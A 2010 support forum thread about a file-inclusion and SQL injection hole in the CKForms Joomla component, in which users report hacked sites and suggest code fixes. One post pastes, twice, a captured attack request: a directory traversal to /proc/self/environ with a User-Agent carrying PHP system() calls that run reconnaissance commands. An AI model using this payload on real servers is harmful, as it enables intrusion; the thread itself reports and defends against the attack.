Hi,
Look here :
http://secunia.com/advisories/40127/
Hope you will release a new version.
Ryo
- Easy to install
- Easy to create
- Easy to configure
- Easy to use
- EN
Ckform vulnerability
12 posts • Page 1 of 2 • 1, 2
Ckform vulnerability
by JD-Webdesign » Sat Jul 03, 2010 7:02 am
- JD-Webdesign
- Posts: 3
- Joined: Wed Apr 21, 2010 9:51 am
Re: Ckform vulnerability
by clueless » Thu Jul 08, 2010 9:24 am
That would interest me too!
Best Regards
Clue
Best Regards
Clue
- clueless
- Posts: 2
- Joined: Thu Jul 08, 2010 9:19 am
Re: Ckform vulnerability
by alles klar » Thu Jul 08, 2010 10:51 am
OH NO.
My nerves are breaking down. I originally wanted to spend summertime in different way, but not on pc and repair the f... websites.
Maybe the style-problems and tooltip-errors also will be fixed in 1.3.5, or 1.4 .
greetings from mental hospital,
a.k.
My nerves are breaking down. I originally wanted to spend summertime in different way, but not on pc and repair the f... websites.
Maybe the style-problems and tooltip-errors also will be fixed in 1.3.5, or 1.4 .
greetings from mental hospital,
a.k.
- alles klar
- Posts: 2
- Joined: Wed Jul 07, 2010 9:46 pm
Re: Ckform vulnerability
by geegdem » Fri Jul 09, 2010 6:04 am
That would interest me too!
Best Regards
geegdem
Best Regards
geegdem
- geegdem
- Posts: 1
- Joined: Fri Jul 09, 2010 6:01 am
Re: Ckform vulnerability
by clueless » Mon Jul 12, 2010 4:12 pm
My site was hacked in version 1.3.3.
Have now switched to RSform Pro
http://www.rsjoomla.com
Have now switched to RSform Pro
http://www.rsjoomla.com
- clueless
- Posts: 2
- Joined: Thu Jul 08, 2010 9:19 am
Re: Ckform vulnerability
by mariom » Tue Jul 13, 2010 9:53 am
My web is being attacked constantly via CKForm.
DISABLING IT NOW!!!
I think you have a big hole:
GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0
Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('ls -al; echo ; exit;'); ?></pre>EXPLORE
My root folder is full of shit now
DISABLING IT NOW!!!
I think you have a big hole:
GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0
Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('ls -al; echo ; exit;'); ?></pre>EXPLORE
My root folder is full of shit now
- mariom
- Posts: 1
- Joined: Tue Jul 13, 2010 9:48 am
Re: Ckform vulnerability
by sixeyeco » Thu Jul 15, 2010 2:55 pm
This is serious. I do not feel comfortable having this on any of the sites I manage and so I have uninstalled it.
Can anyone report their experience with regard to the fixes that have been suggested in other post in this forum?
Can anyone report their experience with regard to the fixes that have been suggested in other post in this forum?
sixeyeco- Posts: 15
- Joined: Wed Jul 14, 2010 4:55 pm
Re: Ckform vulnerability
by allen92 » Tue Jul 20, 2010 4:55 am
To the Developer:
First I would like to you, say thank you for the excellent component you have created. But, at this time we are very concerned about the security of the component. To ease our pain, please tell us a approx time line when a updated version will become available. Please respond, we urgently need your help!!
Sincerely,
Allen Dawson
First I would like to you, say thank you for the excellent component you have created. But, at this time we are very concerned about the security of the component. To ease our pain, please tell us a approx time line when a updated version will become available. Please respond, we urgently need your help!!
Sincerely,
Allen Dawson
- allen92
- Posts: 1
- Joined: Tue Jul 20, 2010 4:49 am
Re: Ckform vulnerability
by Simkea » Thu Jul 22, 2010 1:44 pm
Okay the SQLinjection is not good... v 1.3.4
Here is my suggestion for correction:
./com_ckforms/models/ckformsdata.php
line 87: $this->_id = intval($id);
line 92: return (int)$this->_id;
./com_ckforms/views/ckforms/view.html.php
line 34: $formLink = "index.php?option=com_ckforms&view=ckforms&task=send&id=".intval($ckforms->id);
./com_ckforms/views/ckformsdata/view.html.php
line 37: $id = intval(JRequest::getVar('id','-1'));
these are all places where the ID coming in as a GET ?
Does anyone have any other suggestions ?
The Problem with fileupload...
./com_ckforms/models/ckforms.php
line 292: Filter $ext with allowed extensions... The importance of ending *.php* must be filtered.
Or: change $ckform->uploadpath to a not public path...
Here is my suggestion for correction:
./com_ckforms/models/ckformsdata.php
line 87: $this->_id = intval($id);
line 92: return (int)$this->_id;
./com_ckforms/views/ckforms/view.html.php
line 34: $formLink = "index.php?option=com_ckforms&view=ckforms&task=send&id=".intval($ckforms->id);
./com_ckforms/views/ckformsdata/view.html.php
line 37: $id = intval(JRequest::getVar('id','-1'));
these are all places where the ID coming in as a GET ?
Does anyone have any other suggestions ?
The Problem with fileupload...
./com_ckforms/models/ckforms.php
line 292: Filter $ext with allowed extensions... The importance of ending *.php* must be filtered.
Or: change $ckform->uploadpath to a not public path...
- Simkea
- Posts: 6
- Joined: Thu Jul 22, 2010 12:06 pm
Re: Ckform vulnerability
by Vinegar » Tue Jul 27, 2010 6:35 pm
Hello,
i'm not sure if this will work and solve the problem, the "id" isn't always a numeric/integer value, its differend and depends from the calling function.
i placed a simple "echo $id;" at the described lines and i got back a string with a leading character and the numeric id e.g. "f4".
greetings
thomas
i'm not sure if this will work and solve the problem, the "id" isn't always a numeric/integer value, its differend and depends from the calling function.
i placed a simple "echo $id;" at the described lines and i got back a string with a leading character and the numeric id e.g. "f4".
greetings
thomas
- Vinegar
- Posts: 1
- Joined: Tue Jul 27, 2010 6:25 pm
12 posts • Page 1 of 2 • 1, 2
Return to CKForms 1.3.x Support forum
Who is online
Users browsing this forum: Alexa [Bot] and 0 guests